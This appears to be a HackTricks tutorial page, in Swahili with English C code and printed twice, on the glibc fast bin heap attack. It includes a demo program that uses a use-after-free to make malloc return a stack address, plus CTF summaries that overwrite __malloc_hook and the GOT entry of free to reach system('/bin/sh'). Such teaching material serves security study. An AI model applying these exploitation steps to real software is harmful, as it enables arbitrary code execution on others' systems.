Fast Bin Attack

Jifunze na zoezi la Kuvamia AWS:Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya AWS (ARTE) Jifunze na zoezi la Kuvamia GCP: Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya GCP (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za kuvamia kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa Msingi

Kwa maelezo zaidi kuhusu ni nini kibin cha haraka, tafadhali angalia ukurasa huu:

Bins & Memory Allocations

Kwa kuwa kibin cha haraka ni orodha ya viungo vya pekee, kuna kinga chache sana kuliko kwenye mabakuli mengine na kubadilisha anwani katika kipande cha kibin cha haraka kilichofutwa ni ya kutosha kuweza kuweka kipande baadaye katika anwani yoyote ya kumbukumbu.

Kwa muhtasari:

ptr0 = malloc(0x20);
ptr1 = malloc(0x20);

// Put them in fast bin (suppose tcache is full)
free(ptr0)
free(ptr1)

// Use-after-free
// Modify the address where the free chunk of ptr1 is pointing
*ptr1 = (unsigned long)((char *)&<address>);

ptr2 = malloc(0x20); // This will get ptr1
ptr3 = malloc(0x20); // This will get a chunk in the <address> which could be abuse to overwrite arbitrary content inside of it

Unaweza kupata mfano kamili katika namna iliyoelezwa vizuri sana katika msimbo kutoka https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(void)
{
puts("Today we will be discussing a fastbin attack.");
puts("There are 10 fastbins, which act as linked lists (they're separated by size).");
puts("When a chunk is freed within a certain size range, it is added to one of the fastbin linked lists.");
puts("Then when a chunk is allocated of a similar size, it grabs chunks from the corresponding fastbin (if there are chunks in it).");
puts("(think sizes 0x10-0x60 for fastbins, but that can change depending on some settings)");
puts("\nThis attack will essentially attack the fastbin by using a bug to edit the linked list to point to a fake chunk we want to allocate.");
puts("Pointers in this linked list are allocated when we allocate a chunk of the size that corresponds to the fastbin.");
puts("So we will just allocate chunks from the fastbin after we edit a pointer to point to our fake chunk, to get malloc to return a pointer to our fake chunk.\n");
puts("So the tl;dr objective of a fastbin attack is to allocate a chunk to a memory region of our choosing.\n");

puts("Let's start, we will allocate three chunks of size 0x30\n");
unsigned long *ptr0, *ptr1, *ptr2;

ptr0 = malloc(0x30);
ptr1 = malloc(0x30);
ptr2 = malloc(0x30);

printf("Chunk 0: %p\n", ptr0);
printf("Chunk 1: %p\n", ptr1);
printf("Chunk 2: %p\n\n", ptr2);


printf("Next we will make an integer variable on the stack. Our goal will be to allocate a chunk to this variable (because why not).\n");

int stackVar = 0x55;

printf("Integer: %x\t @: %p\n\n", stackVar, &stackVar);

printf("Proceeding that I'm going to write just some data to the three heap chunks\n");

char *data0 = "00000000";
char *data1 = "11111111";
char *data2 = "22222222";

memcpy(ptr0, data0, 0x8);
memcpy(ptr1, data1, 0x8);
memcpy(ptr2, data2, 0x8);

printf("We can see the data that is held in these chunks. This data will get overwritten when they get added to the fastbin.\n");

printf("Chunk 0: %s\n", (char *)ptr0);
printf("Chunk 1: %s\n", (char *)ptr1);
printf("Chunk 2: %s\n\n", (char *)ptr2);

printf("Next we are going to free all three pointers. This will add all of them to the fastbin linked list. We can see that they hold pointers to chunks that will be allocated.\n");

free(ptr0);
free(ptr1);
free(ptr2);

printf("Chunk0 @ 0x%p\t contains: %lx\n", ptr0, *ptr0);
printf("Chunk1 @ 0x%p\t contains: %lx\n", ptr1, *ptr1);
printf("Chunk2 @ 0x%p\t contains: %lx\n\n", ptr2, *ptr2);

printf("So we can see that the top two entries in the fastbin (the last two chunks we freed) contains pointers to the next chunk in the fastbin. The last chunk in there contains `0x0` as the next pointer to indicate the end of the linked list.\n\n");


printf("Now we will edit a freed chunk (specifically the second chunk \"Chunk 1\"). We will be doing it with a use after free, since after we freed it we didn't get rid of the pointer.\n");
printf("We will edit it so the next pointer points to the address of the stack integer variable we talked about earlier. This way when we allocate this chunk, it will put our fake chunk (which points to the stack integer) on top of the free list.\n\n");

*ptr1 = (unsigned long)((char *)&stackVar);

printf("We can see it's new value of Chunk1 @ %p\t hold: 0x%lx\n\n", ptr1, *ptr1);


printf("Now we will allocate three new chunks. The first one will pretty much be a normal chunk. The second one is the chunk which the next pointer we overwrote with the pointer to the stack variable.\n");
printf("When we allocate that chunk, our fake chunk will be at the top of the fastbin. Then we can just allocate one more chunk from that fastbin to get malloc to return a pointer to the stack variable.\n\n");

unsigned long *ptr3, *ptr4, *ptr5;

ptr3 = malloc(0x30);
ptr4 = malloc(0x30);
ptr5 = malloc(0x30);

printf("Chunk 3: %p\n", ptr3);
printf("Chunk 4: %p\n", ptr4);
printf("Chunk 5: %p\t Contains: 0x%x\n", ptr5, (int)*ptr5);

printf("\n\nJust like that, we executed a fastbin attack to allocate an address to a stack variable using malloc!\n");
}

Ikiwa niwezekana kubadilisha thamani ya kigezo cha kimataifa global_max_fast na nambari kubwa, hii inaruhusu kuzalisha vipande vya fast bin vya ukubwa mkubwa, ikiruhusu kufanya mashambulizi ya fast bin katika hali ambapo hapakuwa na uwezekano hapo awali. Hali hii ni muhimu katika muktadha wa mashambulizi ya large bin na mashambulizi ya unsorted bin

Mifano

CTF https://guyinatuxedo.github.io/28-fastbin_attack/0ctf_babyheap/index.html:
Inawezekana kutenga vipande, kuviachilia, kusoma maudhui yao na kuvijaza (kwa udhaifu wa kujaa).
Konsolidisha kipande kwa infoleak: Mbinu hii ni kimsingi kutumia udhaifu wa kujaa ili kuunda prev_size bandia ili kipande cha awali kiwekwe ndani ya kikubwa, hivyo wakati wa kutenga kikubwa kinachohusisha kipande kingine, inawezekana kuchapisha data yake na kuvuja anwani ya libc (main_arena+88).
Kubadilisha kitanzi cha malloc: Kwa hili, na kutumia hali ya kufunika ya awali, ilikuwa inawezekana kuwa na vipande 2 vilivyokuwa vikionyesha kwa kumbukumbu moja. Kwa hiyo, kuviviachilia vyote (kwa kuvifungua vipande vingine kati yake kuepuka ulinzi) ilikuwa inawezekana kuwa na kipande kimoja katika fast bin mara 2. Kisha, ilikuwa inawezekana kutenga tena, kubadilisha anwani ya kipande kinachofuata ili ielekee kidogo kabla ya __malloc_hook (hivyo inaelekeza kwa nambari ambayo malloc inafikiria ni ukubwa huru - kuepuka tena), kutenga tena na kisha kutenga kipande kingine ambacho kitapokea anwani za kitanzi cha malloc. Hatimaye gadgeti moja ilikuwa imeandikwa humo.
CTF https://guyinatuxedo.github.io/28-fastbin_attack/csaw17_auir/index.html:
Kuna kujaa kwa kumbukumbu na matumizi baada ya kuachilia na kuachilia mara mbili kwa sababu wakati kipande kinapoachiliwa inawezekana kutumia upya na kuachilia upya viashiria
Leak ya habari ya Libc: Tuachie vipande vichache na vitapata kiashiria kwa sehemu ya eneo la uwanja mkuu. Kwa kuwa unaweza kutumia upya viashiria vilivyoachiliwa, soma tu anwani hii.
Mashambulizi ya fast bin: Viashiria vyote kwa kutengwa hukusanywa ndani ya safu, hivyo tunaweza kuachilia vipande vichache vya fast bin na katika cha mwisho kubadilisha anwani ili ielekee kidogo kabla ya safu hii ya viashiria. Kisha, kutenga vipande vichache na ukubwa sawa na tutapata kwanza halali na kisha bandia inayohusisha safu ya viashiria. Sasa tunaweza kubadilisha viashiria hivi vya kutengwa ili kufanya anwani ya GOT ya free ielekee system na kisha andika "/bin/sh" kwenye kipande 1 kisha ite free(chunk1) ambayo badala yake itatekeleza system("/bin/sh").
CTF https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html
Mfano mwingine wa kutumia kujaa kwa kibayeti kimoja kufanya konsolidisha vipande katika unsorted bin na kupata infoleak ya libc na kisha kufanya mashambulizi ya fast bin kubadilisha kitanzi cha malloc na anwani ya gadgeti moja
CTF https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html
Baada ya kuvuja kwa habari kutumia unsorted bin na UAF kuvuja anwani ya libc na anwani ya PIE, shambulio la CTF hili lilifanya mashambulizi ya fast bin kutenga kipande mahali ambapo viashiria kwa vipande vilivyodhibitiwa vilikuwa vimehifadhiwa hivyo ilikuwa inawezekana kubadilisha viashiria fulani ili kuandika gadgeti moja kwenye GOT
Unaweza kupata mashambulizi ya Fast Bin yaliyotumiwa kupitia mashambulizi ya unsorted bin:
Kumbuka kwamba kabla ya kufanya mashambulizi ya fast bin ni kawaida kutumia orodha za kufuta kuvuja anwani za libc/kumbukumbu (kwa haja).
Kiwanda cha Roboti. BlackHat MEA CTF 2022
Tunaweza kutenga vipande vya ukubwa zaidi ya 0x100.
Badilisha global_max_fast kwa kutumia mashambulizi ya Unsorted Bin (inafanya kazi 1/16 ya wakati kutokana na ASLR, kwa sababu tunahitaji kubadilisha biti 12, lakini lazima tubadilishe biti 16).
Mashambulizi ya Fast Bin kubadilisha safu ya kimataifa ya vipande. Hii hutoa msingi wa kusoma/kubadilisha wa kiholela, ambao unaruhusu kubadilisha GOT na kuweka baadhi ya kazi ielekee system.

Unsorted Bin Attack

unga mkono HackTricks

Angalia mpango wa michango!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousUnlink Attack NextUnsorted Bin Attack

Last updated 4 months ago

Taarifa Msingi

Kwa maelezo zaidi kuhusu ni nini kibin cha haraka, tafadhali angalia ukurasa huu:

Bins & Memory Allocations

Kwa muhtasari:

ptr0 = malloc(0x20);
ptr1 = malloc(0x20);

// Put them in fast bin (suppose tcache is full)
free(ptr0)
free(ptr1)

// Use-after-free
// Modify the address where the free chunk of ptr1 is pointing
*ptr1 = (unsigned long)((char *)&<address>);

ptr2 = malloc(0x20); // This will get ptr1
ptr3 = malloc(0x20); // This will get a chunk in the <address> which could be abuse to overwrite arbitrary content inside of it

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(void)
{
puts("Today we will be discussing a fastbin attack.");
puts("There are 10 fastbins, which act as linked lists (they're separated by size).");
puts("When a chunk is freed within a certain size range, it is added to one of the fastbin linked lists.");
puts("Then when a chunk is allocated of a similar size, it grabs chunks from the corresponding fastbin (if there are chunks in it).");
puts("(think sizes 0x10-0x60 for fastbins, but that can change depending on some settings)");
puts("\nThis attack will essentially attack the fastbin by using a bug to edit the linked list to point to a fake chunk we want to allocate.");
puts("Pointers in this linked list are allocated when we allocate a chunk of the size that corresponds to the fastbin.");
puts("So we will just allocate chunks from the fastbin after we edit a pointer to point to our fake chunk, to get malloc to return a pointer to our fake chunk.\n");
puts("So the tl;dr objective of a fastbin attack is to allocate a chunk to a memory region of our choosing.\n");

puts("Let's start, we will allocate three chunks of size 0x30\n");
unsigned long *ptr0, *ptr1, *ptr2;

ptr0 = malloc(0x30);
ptr1 = malloc(0x30);
ptr2 = malloc(0x30);

printf("Chunk 0: %p\n", ptr0);
printf("Chunk 1: %p\n", ptr1);
printf("Chunk 2: %p\n\n", ptr2);


printf("Next we will make an integer variable on the stack. Our goal will be to allocate a chunk to this variable (because why not).\n");

int stackVar = 0x55;

printf("Integer: %x\t @: %p\n\n", stackVar, &stackVar);

printf("Proceeding that I'm going to write just some data to the three heap chunks\n");

char *data0 = "00000000";
char *data1 = "11111111";
char *data2 = "22222222";

memcpy(ptr0, data0, 0x8);
memcpy(ptr1, data1, 0x8);
memcpy(ptr2, data2, 0x8);

printf("We can see the data that is held in these chunks. This data will get overwritten when they get added to the fastbin.\n");

printf("Chunk 0: %s\n", (char *)ptr0);
printf("Chunk 1: %s\n", (char *)ptr1);
printf("Chunk 2: %s\n\n", (char *)ptr2);

printf("Next we are going to free all three pointers. This will add all of them to the fastbin linked list. We can see that they hold pointers to chunks that will be allocated.\n");

free(ptr0);
free(ptr1);
free(ptr2);

printf("Chunk0 @ 0x%p\t contains: %lx\n", ptr0, *ptr0);
printf("Chunk1 @ 0x%p\t contains: %lx\n", ptr1, *ptr1);
printf("Chunk2 @ 0x%p\t contains: %lx\n\n", ptr2, *ptr2);

printf("So we can see that the top two entries in the fastbin (the last two chunks we freed) contains pointers to the next chunk in the fastbin. The last chunk in there contains `0x0` as the next pointer to indicate the end of the linked list.\n\n");


printf("Now we will edit a freed chunk (specifically the second chunk \"Chunk 1\"). We will be doing it with a use after free, since after we freed it we didn't get rid of the pointer.\n");
printf("We will edit it so the next pointer points to the address of the stack integer variable we talked about earlier. This way when we allocate this chunk, it will put our fake chunk (which points to the stack integer) on top of the free list.\n\n");

*ptr1 = (unsigned long)((char *)&stackVar);

printf("We can see it's new value of Chunk1 @ %p\t hold: 0x%lx\n\n", ptr1, *ptr1);


printf("Now we will allocate three new chunks. The first one will pretty much be a normal chunk. The second one is the chunk which the next pointer we overwrote with the pointer to the stack variable.\n");
printf("When we allocate that chunk, our fake chunk will be at the top of the fastbin. Then we can just allocate one more chunk from that fastbin to get malloc to return a pointer to the stack variable.\n\n");

unsigned long *ptr3, *ptr4, *ptr5;

ptr3 = malloc(0x30);
ptr4 = malloc(0x30);
ptr5 = malloc(0x30);

printf("Chunk 3: %p\n", ptr3);
printf("Chunk 4: %p\n", ptr4);
printf("Chunk 5: %p\t Contains: 0x%x\n", ptr5, (int)*ptr5);

printf("\n\nJust like that, we executed a fastbin attack to allocate an address to a stack variable using malloc!\n");
}

Mifano

CTF https://guyinatuxedo.github.io/28-fastbin_attack/0ctf_babyheap/index.html:

Inawezekana kutenga vipande, kuviachilia, kusoma maudhui yao na kuvijaza (kwa udhaifu wa kujaa).

Konsolidisha kipande kwa infoleak: Mbinu hii ni kimsingi kutumia udhaifu wa kujaa ili kuunda prev_size bandia ili kipande cha awali kiwekwe ndani ya kikubwa, hivyo wakati wa kutenga kikubwa kinachohusisha kipande kingine, inawezekana kuchapisha data yake na kuvuja anwani ya libc (main_arena+88).

Kubadilisha kitanzi cha malloc: Kwa hili, na kutumia hali ya kufunika ya awali, ilikuwa inawezekana kuwa na vipande 2 vilivyokuwa vikionyesha kwa kumbukumbu moja. Kwa hiyo, kuviviachilia vyote (kwa kuvifungua vipande vingine kati yake kuepuka ulinzi) ilikuwa inawezekana kuwa na kipande kimoja katika fast bin mara 2. Kisha, ilikuwa inawezekana kutenga tena, kubadilisha anwani ya kipande kinachofuata ili ielekee kidogo kabla ya __malloc_hook (hivyo inaelekeza kwa nambari ambayo malloc inafikiria ni ukubwa huru - kuepuka tena), kutenga tena na kisha kutenga kipande kingine ambacho kitapokea anwani za kitanzi cha malloc. Hatimaye gadgeti moja ilikuwa imeandikwa humo.

CTF https://guyinatuxedo.github.io/28-fastbin_attack/csaw17_auir/index.html:

Kuna kujaa kwa kumbukumbu na matumizi baada ya kuachilia na kuachilia mara mbili kwa sababu wakati kipande kinapoachiliwa inawezekana kutumia upya na kuachilia upya viashiria

Leak ya habari ya Libc: Tuachie vipande vichache na vitapata kiashiria kwa sehemu ya eneo la uwanja mkuu. Kwa kuwa unaweza kutumia upya viashiria vilivyoachiliwa, soma tu anwani hii.

Mashambulizi ya fast bin: Viashiria vyote kwa kutengwa hukusanywa ndani ya safu, hivyo tunaweza kuachilia vipande vichache vya fast bin na katika cha mwisho kubadilisha anwani ili ielekee kidogo kabla ya safu hii ya viashiria. Kisha, kutenga vipande vichache na ukubwa sawa na tutapata kwanza halali na kisha bandia inayohusisha safu ya viashiria. Sasa tunaweza kubadilisha viashiria hivi vya kutengwa ili kufanya anwani ya GOT ya free ielekee system na kisha andika "/bin/sh" kwenye kipande 1 kisha ite free(chunk1) ambayo badala yake itatekeleza system("/bin/sh").

CTF https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html

Mfano mwingine wa kutumia kujaa kwa kibayeti kimoja kufanya konsolidisha vipande katika unsorted bin na kupata infoleak ya libc na kisha kufanya mashambulizi ya fast bin kubadilisha kitanzi cha malloc na anwani ya gadgeti moja

CTF https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html

Baada ya kuvuja kwa habari kutumia unsorted bin na UAF kuvuja anwani ya libc na anwani ya PIE, shambulio la CTF hili lilifanya mashambulizi ya fast bin kutenga kipande mahali ambapo viashiria kwa vipande vilivyodhibitiwa vilikuwa vimehifadhiwa hivyo ilikuwa inawezekana kubadilisha viashiria fulani ili kuandika gadgeti moja kwenye GOT

Unaweza kupata mashambulizi ya Fast Bin yaliyotumiwa kupitia mashambulizi ya unsorted bin:

Kumbuka kwamba kabla ya kufanya mashambulizi ya fast bin ni kawaida kutumia orodha za kufuta kuvuja anwani za libc/kumbukumbu (kwa haja).

Kiwanda cha Roboti. BlackHat MEA CTF 2022

Tunaweza kutenga vipande vya ukubwa zaidi ya 0x100.

Badilisha global_max_fast kwa kutumia mashambulizi ya Unsorted Bin (inafanya kazi 1/16 ya wakati kutokana na ASLR, kwa sababu tunahitaji kubadilisha biti 12, lakini lazima tubadilishe biti 16).

Mashambulizi ya Fast Bin kubadilisha safu ya kimataifa ya vipande. Hii hutoa msingi wa kusoma/kubadilisha wa kiholela, ambao unaruhusu kubadilisha GOT na kuweka baadhi ya kazi ielekee system.

Unsorted Bin Attack